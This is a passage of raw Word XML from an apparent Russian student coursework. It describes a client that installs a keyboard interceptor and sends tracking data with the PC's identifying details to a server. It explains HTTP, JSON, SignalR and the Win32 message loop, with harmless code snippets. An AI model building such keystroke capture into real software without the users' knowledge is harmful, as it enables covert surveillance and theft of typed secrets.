      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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Запуск и установку перехватчика клавиатуры</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FBD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD1FBD" w:rsidRPr="00922E24" w:rsidRDefault="00922E24" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922E24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Передачу данных учета серверу с учетными идентификационными данными ПК</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FBD" w:rsidRPr="00922E24">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRDefault="000F2DB5" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Серверное приложение выполняет следующие функции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F2DB5" w:rsidRPr="00BD1FBD" w:rsidRDefault="00922E24" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Прием и структурирование данных учета отдельной ЭВМ</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FBD" w:rsidRPr="00BD1FBD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD1FBD" w:rsidRDefault="00922E24" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Отображение данных учета по каждой под учетной ЭВМ в отдельности</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FBD" w:rsidRPr="00BD1FBD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD1FBD" w:rsidRDefault="00922E24" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Обновление данных в реальном времени</w:t>
      </w:r>
      <w:r w:rsidR="00803D07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00151562">
        <w:t>через технологов</w:t>
      </w:r>
      <w:r w:rsidR="00803D07">
        <w:t xml:space="preserve"> пуш</w:t>
      </w:r>
      <w:r w:rsidR="00151562">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00803D07">
        <w:t>уведомлений</w:t>
      </w:r>
      <w:r w:rsidR="00BD1FBD" w:rsidRPr="00BD1FBD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>В качестве протокола общения между клиентами и сервером используется протокол HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008515D5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HyperText Transfer Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008515D5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>протокол передачи гипертекста</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>– протокол прикладного уровня передачи данных. Основой HTTP является технология «клиент-сервер», то есть предполагается существование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRPr="00BC6A0D" w:rsidRDefault="00DD5091" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6A0D">
        <w:t>лиентов, которые иницииру</w:t>
      </w:r>
      <w:r>
        <w:t>ют соединение и посылают запрос.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRPr="00BC6A0D" w:rsidRDefault="00DD5091" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6A0D">
        <w:t>ерверов, которые ожидают соединения для получения запроса, производят необходимые действия и возвращают обратно сообщение с результатом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>HTTP-запрос состоит из следующих частей:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Строка запроса. Указывает метод передачи, URL-адрес, к которому нужно обратиться и версию протокола HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Заголовки. Описывают тело сообщения, передают различные параметры и другие сведения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Тело сообщения. Это сами данные, которые передаются в запросе. Тело сообщения – это необязательный параметр, который может отсутствовать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Такой же структурой обладает HTTP-ответ сервера клиенту. В качестве тела сообщения запроса могут выступать данные любого формата. В рамках курсовой работы используются JSON формат при работе пользовательского приложения с сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>JSON основан на двух структурах данных:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Коллекция пар ключ-значение. </w:t>
      </w:r>
      <w:r w:rsidR="00824023">
        <w:t>В языках программирования реализован</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как объект, запись, структура, словарь, хэш, ассоциативный массив.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Упорядоченный список значений. </w:t>
      </w:r>
      <w:r w:rsidR="00824023">
        <w:t xml:space="preserve">В языках программирования </w:t>
      </w:r>
      <w:r>
        <w:t>реализован как массив, вектор, список или последовательность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5091" w:rsidRDefault="00DD5091" w:rsidP="00ED6F1F">
      <w:r>
        <w:t>Это универсальные структуры данных</w:t>
      </w:r>
      <w:r w:rsidR="00824023">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803D07">
        <w:t>поддерживает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любой современный язык </w:t>
      </w:r>
      <w:r w:rsidR="00803D07">
        <w:t>программирования</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803D07" w:rsidRDefault="00803D07" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">Обновление данных в реальном времени на сервере производится через технологию пуш-уведомлений библиотеки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SignalR</w:t>
      </w:r>
      <w:r w:rsidRPr="00803D07">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803D07" w:rsidRDefault="00803D07" w:rsidP="00803D07">
      <w:r>
        <w:t>SignalR предоставляет простой API для создания функционала, который позволяет вызывать функции JavaScript на стороне клиента из серверного кода, написанного с помощью языков платформы .NET. SignalR значительно упрощает работу с коммуникациями реального времени. Библиотека обрабатывает все подключения и автоматически рассылает сообщения всем подключенным клиентам, либо каким-нибудь специфическим клиентам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00803D07" w:rsidRDefault="00803D07" w:rsidP="00803D07">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Фактически библиотека SignalR состоит из API серверной стороны, который применяется в коде на C#, и из клиентских библиотек JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00803D07">
      <w:r w:rsidRPr="00B83147">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Перехват нажатия клавиатуры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t>Приложение с графическим интерфейсом должно реагировать на события пользователя и операционной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t>События от пользователя включают все способы, которыми кто-то может взаимодействовать с программой: щелчки мышью, нажатия клавиш, жесты сенсорного экрана и так далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t>События из операционной системы включают в себя все, что находится «вне» программы, что может повлиять на ее поведение. Например, пользователь может подключить новое аппаратное устройство, или Windows может перейти в состояние пониженного энергопотребления (спящий режим или режим гибернации).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t xml:space="preserve">Эти события могут произойти в любое время во время работы программы, практически в любом порядке. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t xml:space="preserve">Чтобы решить эту проблему, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> использует модель передачи сообщений. Операционная система связывается с окном приложения, передавая ему сообщения. Сообщение - это просто числовой код, обозначающий конкретное событие. Например, если пользователь нажимает левую кнопку мыши, окно получает сообщение со следующим кодом сообщения – листинг 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463B17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRPr="00463B17" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 1. Код нажатия левой клавиши мыши.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83147" w:rsidTr="008A4402">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B83147" w:rsidRPr="00463B17" w:rsidRDefault="00B83147" w:rsidP="008A4402">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463B17">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00463B17">
              <w:rPr>
                <w:rStyle w:val="hljs-meta-keyword"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
              </w:rPr>
              <w:t>define</w:t>
            </w:r>
            <w:r w:rsidRPr="00463B17">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
              </w:rPr>
              <w:t xml:space="preserve"> WM_LBUTTONDOWN    0x0201</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t>С некоторыми сообщениями связаны данные. Например, сообщение WM_LBUTTONDOWN включает в себя x-координату и y-координату курсора мыши.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRPr="00463B17" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t>Чтобы передать сообщение окну, операционная система вызывает процедуру окна, зарегистрированную для этого окна.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007324E8" w:rsidRDefault="007324E8" w:rsidP="00B83147">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007324E8" w:rsidRDefault="007324E8" w:rsidP="00B83147">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRPr="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B83147">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Цикл сообщений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83147" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t>Приложение будет получать тыс</w:t>
      </w:r>
      <w:r w:rsidR="007324E8">
        <w:t xml:space="preserve">ячи сообщений во время работы. </w:t>
      </w:r>
      <w:r>
        <w:t>Кроме того, приложение может иметь несколько окон, каждое из которых имеет свою собственную оконную процедуру. Приложению необходим цикл для извлечения сообщений и отправки их в правильные окна.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324875" w:rsidRDefault="00B83147" w:rsidP="00B83147">
      <w:r>
        <w:t xml:space="preserve">Для каждого потока, который создает окно, операционная система создает очередь для сообщений окна. Эта очередь содержит сообщения для всех окон, созданных в этом потоке. Сама очередь скрыта от программы. </w:t>
      </w:r>
      <w:r w:rsidR="00825014">
        <w:t>Нет возможности</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> управлять очередью напрямую. Однако </w:t>
      </w:r>
      <w:r w:rsidR="00825014">
        <w:t>можно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> извлечь сообщение из очереди, вызвав функцию GetMessage</w:t>
      </w:r>
      <w:r w:rsidR="00324875">
        <w:t xml:space="preserve"> – листинг 2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324875" w:rsidRDefault="00324875" w:rsidP="00324875">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 2 – функция GetMessage.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24875" w:rsidRPr="00A260A4" w:rsidTr="00324875">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00324875" w:rsidRPr="00527683" w:rsidRDefault="00324875" w:rsidP="00324875">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527683">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>MSG msg;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00324875" w:rsidRPr="00527683" w:rsidRDefault="00324875" w:rsidP="00324875">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527683">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">GetMessage(&amp;msg, </w:t>
            </w:r>
            <w:r w:rsidRPr="00527683">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>NULL</w:t>
            </w:r>
            <w:r w:rsidRPr="00527683">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00527683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ru-RU"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00527683">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00527683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ru-RU"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00527683">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00324875" w:rsidRDefault="00324875" w:rsidP="00324875">
      <w:r>
        <w:t xml:space="preserve">Эта функция удаляет первое сообщение из заголовка очереди. Если очередь пуста, функция блокируется, пока другое сообщение не будет поставлено в очередь. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324875" w:rsidRDefault="00324875" w:rsidP="00324875">
      <w:r>
        <w:t xml:space="preserve">Первый параметр GetMessage - это адрес структуры MSG. Если функция завершается успешно, она заполняет структуру MSG информацией о сообщении. Это включает в себя целевое окно и код сообщения. Три других параметра позволяют фильтровать, какие сообщения </w:t>
      </w:r>
      <w:r w:rsidR="00825014">
        <w:t>получать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из очереди. Почти во всех случаях эти параметры </w:t>
      </w:r>
      <w:r w:rsidR="00825014">
        <w:t xml:space="preserve">устанавливаются </w:t>
      </w:r>
      <w:r>
        <w:t>на ноль.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324875" w:rsidRDefault="00324875" w:rsidP="00324875">
      <w:r>
        <w:t xml:space="preserve">Хотя структура MSG содержит информацию о сообщении, </w:t>
      </w:r>
      <w:r w:rsidR="007324E8">
        <w:t xml:space="preserve">эта структура на практике </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t>не декомпозируется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007324E8">
        <w:t>Она передается</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> двум другим функциям</w:t>
      </w:r>
      <w:r w:rsidR="00340FB4">
        <w:t xml:space="preserve"> – листинг 3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00340FB4" w:rsidRPr="00825014" w:rsidRDefault="00340FB4" w:rsidP="00340FB4">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00825014">
        <w:t xml:space="preserve"> 3 – </w:t>
      </w:r>
      <w:r>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="00825014">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00340FB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TranslateMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00825014">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00340FB4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DispatchMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00825014">
        <w:t>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0FB4" w:rsidTr="00340FB4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00340FB4" w:rsidRPr="00340FB4" w:rsidRDefault="00340FB4" w:rsidP="00340FB4">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00340FB4">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">TranslateMessage(&amp;msg); </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00340FB4" w:rsidRDefault="00340FB4" w:rsidP="00340FB4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00340FB4">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DispatchMessage(&amp;msg);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00700336" w:rsidRDefault="00700336" w:rsidP="00700336">
      <w:r>
        <w:t>Функция TranslateMessage связана с вводом с клавиатуры. Он переводит нажатия клавиш (клавиша вниз, клавиша вверх) в символы</w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t xml:space="preserve"> и вызывается</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до DispatchMessage. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700336" w:rsidRDefault="00700336" w:rsidP="00700336">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Функция DispatchMessage сообщает операционной системе, чтобы она вызывала оконную процедуру окна, которое является целью сообщения. Другими словами, операционная система ищет дескриптор окна в своей таблице окон, находит указатель функции, связанный с окном, и вызывает функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700336" w:rsidRDefault="00700336" w:rsidP="00700336">
      <w:r>
        <w:t>Например, предположим, что пользователь нажимает левую кнопку мыши. Это вызывает цепочку событий:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00700336" w:rsidRDefault="00700336" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="709"/>
      </w:pPr>
      <w:r>
        <w:t>Операционная система помещает сообщение WM_LBUTTONDOWN в очередь сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00183B10" w:rsidRDefault="00F02388" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
